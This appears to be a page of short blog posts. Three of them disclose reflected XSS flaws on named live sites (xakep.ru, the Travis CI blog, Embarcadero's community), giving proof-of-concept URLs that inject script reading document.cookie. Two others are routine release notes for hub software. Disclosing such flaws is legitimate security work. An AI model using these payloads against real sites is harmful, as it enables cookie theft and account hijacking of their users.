Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

You can request any XSS code directly using GET method and lang parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2018-03-09 22:400 comments3 likes

Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2018-02-24 22:540 comments4 likes

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2018-02-24 13:470 comments4 likes

Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Postat av verlihub den 2018-02-19 14:180 comments4 likes

Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Postat av ledokol den 2018-02-19 13:490 comments4 likes
« Bakåt • 1 • Framåt »